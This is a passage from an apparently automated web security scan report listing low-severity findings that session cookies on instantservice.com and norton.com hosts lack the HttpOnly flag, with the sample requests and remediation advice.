https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg
https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif
https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js
https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js
https://trust-center.verisign.com/rcm/verisign/scripts/default.js
https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js
https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js
https://trust-center.verisign.com/rcm/verisign/scripts/popup.js
https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js
https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js
https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js
https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js
https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
https://trust-center.verisign.com/rcm/verisign/style/brand.css
https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
https://trust-center.verisign.com/rcm/verisign/style/module.css
https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif
http://www.verisign.co.uk/hp07/i/vlogo.gif
https://www.verisign.com/assets/visual-sciences/vip/zig.js
https://www4.symantec.com/Vrt/wl

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

10.1. https://admin.instantservice.com/Customer previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/Customer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Customer HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.2. https://admin.instantservice.com/links/5851/14753 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/links/5851/14753

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/14753 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.3. https://admin.instantservice.com/links/5851/16144 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/links/5851/16144

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/16144 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.4. https://admin.instantservice.com/links/5851/16145 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/links/5851/16145

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/16145 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.5. https://admin.instantservice.com/links/5851/39897 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/links/5851/39897

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/39897 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.6. http://buy.norton.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.7. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.8. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.9. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.10. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.11. http://buy.norton.com/estore/mf/landingProductFeatures previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/landingProductFeatures

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.